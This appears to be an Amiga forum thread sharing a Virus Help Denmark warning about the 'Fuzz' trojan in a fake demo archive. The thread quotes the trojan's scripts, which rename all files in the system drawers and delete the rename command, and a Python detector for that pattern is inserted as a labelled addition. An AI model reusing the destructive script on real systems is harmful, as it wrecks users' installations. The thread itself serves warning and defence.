12 April 2020, 01:06 | #1 |
Moderator
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
|
Amiga Virus Warnings
This message is to share with you a very recent trojan alert:
Code:
------------------------
Amiga Virus Encyclopedia
Fuzz Trojan
Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
------------------------------------------------------------
........................ VIRUS HELP DENMARK ......................

Hi All....                                         11 April 2020

We have just received this archive. It is said to be a demo for ECS & AGA machines. But if you run this demo, the files on your Amiga system in C:, S:, Devs:, L:, Libs: will be renamed.

We are not really sure how old this trojan is, but at this time there is NO ANTIVIRUS program that can find it. So watch out for it.

Here is some info about the trojan:
------------------------------------------------------
Trojan name... : Fuzz
Trojan file... : Many files do damage
Trojan size... : Many files
Trojan archive : Stellarx.lha
Archive size.. : 444.898 bytes
Archive info.. : 'Stellar X' Demo - ECS & AGA Machines
------------------------------------------------------

There is a ReadMe.txt in the archive, with an ad from a Canadian BBS, called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem. So we guess it must be an old trojan, there ain't many BBS'es left.

The trojan bomb is named 'Stellar X Demo'. When you start the Demo, it looks like this:

    Yo! Fuk-Dat-Boyee... UpTheAss
    Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
    navel creditz

The FuZZ trojan archive contains many other files:

    BooYaKa               = Script-File
    BooYaka.info          = Icon
    ReadMe.txt            = BBS ad
    DATA/Boyee            = Rename-Command
    DATA/Yo!              = Run-Command
    DATA/Fuk-Dat-Boyee... = CLI Show-Command (Picture-Shower)
    DATA/navel            = Execute-Command
    DATA/Fuk-Diz-Boyee... = Noiseplayer (Module-Player)
    DATA/Wigger!          = Soundmodule
    DATA/fuzzy            = List-Command
    DATA/creditz          = Script-File
    DATA/Dude             = Dir-Command
    DATA/BooYaKa          = Script-File
    DATA/UpTheAss         = Picture

If you start the trojan, it executes the Script-File 'BooYaKa', where you can read this in the script:

    cd data
    execute booyaka

This means that the trojan will execute the file 'DATA/BooYaKa'. This file contains:

    Yo! Fuk-Dat-Boyee... UpTheAss
    Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
    navel creditz

Now the trojan displays the picture 'UpTheAss'. Then the module Wigger!. And executes the script-file creditz:

    fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ"
    navel rank
    fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ"
    navel rank
    fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ"
    navel rank
    fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ"
    navel rank
    fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ"
    navel rank
    fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ"
    navel rank
    delete c:rename

Now the trojan will rename every file in:

    S:
    C:
    Fonts:
    Libs:
    L:
    Devs:

And deletes the command c:rename

Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE

Regards....
         __   Jan Andersen
   __   ///   ------------
   \\\///     Virus Help Denmark
    \XX/      www.vht-dk.dk |
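A static check for the script pattern in the advisory above, as an added example that is not part of the original thread or of any antivirus mentioned in it. Because the archive disguises List, Rename and Execute under other names, the check ignores command names and looks at what a script does: building commands against a system assign with lformat, running the generated file, or deleting from a system assign. The function name, rule names and the benign sample are assumptions made for the illustration.

```python
import re

# Assigns the advisory lists as targets: S:, C:, Fonts:, Libs:, L:, Devs:
ASSIGN_RE = re.compile(r'(?<![A-Za-z0-9%])(s|c|devs|libs|l|fonts):', re.I)
LFORMAT_RE = re.compile(r'\blformat\s+"([^"]*)"', re.I)
REDIRECT_RE = re.compile(r'(?<!\S)>\s*(\S+)')
DELETE_RE = re.compile(r'^delete\s+(\S+)', re.I)


def scan_script(text):
    """Return (line_no, rule, line) findings for one AmigaDOS script."""
    findings, generated = [], set()
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(";"):      # blank line or comment
            continue
        fmt = LFORMAT_RE.search(line)
        if fmt and ASSIGN_RE.search(fmt.group(1)):
            # A listing is turned into commands that act on a system assign.
            findings.append((no, "builds-commands-on-system-assign", line))
            out = REDIRECT_RE.search(LFORMAT_RE.sub("", line))
            if out:
                generated.add(out.group(1).lower())
            continue
        words = line.split()
        if len(words) >= 2 and words[-1].lower() in generated:
            # Whatever the command is called, it is fed the generated file.
            findings.append((no, "runs-generated-file", line))
        dele = DELETE_RE.match(line)
        if dele and ASSIGN_RE.match(dele.group(1)):
            findings.append((no, "deletes-from-system-assign", line))
    return findings


# The 'creditz' script as quoted in the advisory above.
CREDITZ = "\n".join(
    f'fuzzy >rank {a}: lformat "boyee %s%s {a}:%s.FuZZ"\nnavel rank'
    for a in ("s", "devs", "libs", "l", "fonts", "c")
) + "\ndelete c:rename\n"

# Constructed benign script for comparison (not from the page).
BENIGN = '; list a drawer\nlist >ram:files work:demos lformat "%s%s"\ndelete ram:files\n'

if __name__ == "__main__":
    for finding in scan_script(CREDITZ):
        print(finding)
    print("benign findings:", scan_script(BENIGN))
```

Run it over every text file extracted from an archive before the archive goes anywhere near a real or emulated system partition.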
12 April 2020, 12:33 | #2 |
Registered User
|
Thx for the info !
|
12 April 2020, 13:50 | #3 |
Registered User
Join Date: Feb 2020
Location: Finland
Posts: 129
|
As the original message is more of an announcement than a question, I dare to write a few lines about viruses here.
I've been wondering, do you people still find viruses in your Amiga systems? I remember back in the day when we used to get games the_way_we_did, demo- and utils disc etc, at least I found a lot of them. Very often after trying for example a few games and booting from HD after that, VirusX told me that something (mostly Lamer Exterminator) was found in the memory. Today we get all our 'warez' online in ADF format, and one would think they are the exact same discs as 30 years ago but during my retrosessions over the years I can't remember a single issue with viruses. Were my friends just careless (well, most likely, I was the only one doing also other things than only gaming) or is the retroscene so aware of things that stuff has been cleaned before distributing or what is the case? |
12 April 2020, 14:19 | #4 |
Registered User
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
|
how can it delete "rename" after it renamed everything in c: ?
|
12 April 2020, 14:28 | #5 |
Computer Wizard
Join Date: Aug 2007
Location: Ramberg/Norway
Posts: 928
|
It can do that if the "Rename" command is resident in memory.
|
12 April 2020, 14:39 | #6 |
Moderator
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
|
@PDrill
We are more informed today than we were back then and, more importantly, the mode of distribution has changed. Before, there was a lot of hand-to-hand exchange and that favoured the spread of viruses. Today, we have access to the same sources and in case of contamination, we warn the author to correct the problem at the root (example : Cetro del Sol).
@Gorf
This line seems misplaced as it should delete "Rename" before changing the names in folder C: You can be malicious and stupid! |
12 April 2020, 15:07 | #7 |
Registered User
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
|
|
12 April 2020, 15:14 | #8 |
Computer Wizard
Join Date: Aug 2007
Location: Ramberg/Norway
Posts: 928
|
Have you never heard of an OS that has the commands resident in memory?
|
12 April 2020, 15:32 | #9 |
Registered User
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
|
|
12 April 2020, 16:24 | #10 |
Registered User
Join Date: Oct 2009
Location: Germany
Posts: 3,303
|
The last line (delete c:rename) in the script shouldn't work, because of renaming everything in C: first.
|
12 April 2020, 16:46 | #11 |
Zone Friend
|
if the script isn't run or executed then the trojan doesn't run.. so delete the file creditz which is the script which does the renaming or is that just too simple..
or replace the creditz file/script with a blank 0byte file called creditz. or better yet just get the whole file deleted from wherever it's uploaded. |
12 April 2020, 17:06 | #12 | |
Registered User
Join Date: Jan 2002
Location: Germany
Posts: 6,987
|
Quote:
People are indeed careless. As a result every now and then a thread pops up complaining that the Amiga / Harddrive / HDF / Emulation does not boot any more or strange things happen. After investigation it turns out as an infection with a known virus. Some even infect their entire floppy collection with a boot virus, just because they don't enable the write protection. |
|
12 April 2020, 17:16 | #13 |
Moderator
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
|
@andy2004
yes, to avoid the malicious code, just delete the line "navel creditz" of "DATA/BooYaKa" but you would do it because you know there is a problem with this archive.. I found 3 different warez sources for this archive and I didn't search too much. For me the biggest problem in there is that no antivirus detects this script... |
12 April 2020, 21:25 | #14 | |
Registered User
Join Date: Aug 2014
Location: Brindisi (Italy)
Age: 70
Posts: 8,248
|
Quote:
-> Navel (camouflaged file is basically the old "Execute" from 1991)
-> fuzzy (this is also a camouflaged file is the 1991 "List" command)
-> boyee (another camouflage is the 1991 "Rename" command)
Last edited by AMIGASYSTEM; 13 April 2020 at 01:19. |
|
12 April 2020, 23:11 | #15 |
Zone Friend
|
I would delete the line except for 1 thing.. I don't do DEMOS, never have in all the years I had an Amiga.. didn't have a hdd either in my a600, and memory would have been cleaned at every reboot after inserting a new disk. Yes I looked at disc mags, games, but mainly apps.
|
13 April 2020, 02:03 | #16 |
Moderator
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
|
Here is my list of bootblocks viruses with the detection (or not!) by the library on which the latest antivirus is based : xvs.library v33.42
Stay safe... |
13 April 2020, 11:37 | #17 |
Phone Homer
Join Date: Jun 2006
Location: 5150
Posts: 5,773
|
If you worked your way through BBS collections you probably would get a virus.
|
13 April 2020, 20:32 | #18 |
Registered User
Join Date: Feb 2007
Location: Melbourne, Australia
Age: 41
Posts: 3,773
|
|
13 April 2020, 22:59 | #19 |
Registered User
Join Date: Mar 2004
Location: finland
Posts: 1,838
|
Keep pressed 10 seconds.
|
14 April 2020, 02:37 | #20 |
Registered User
Join Date: Aug 2016
Location: Earth
Posts: 884
|
Mostly I wasn't into demos either, except for games. Once extracted..I'd check the contents. Then I see rap slang or "irritated" stuff, I'd delete. But then I enjoyed checking scripts too, I checked all stuff I download..at least once. Unless I knew the source is good. Most people I knew checked stuff. But still kept VirusZ and others handy. Rarely did anything get through..."our firewall", haha.
Thanks for the tip! |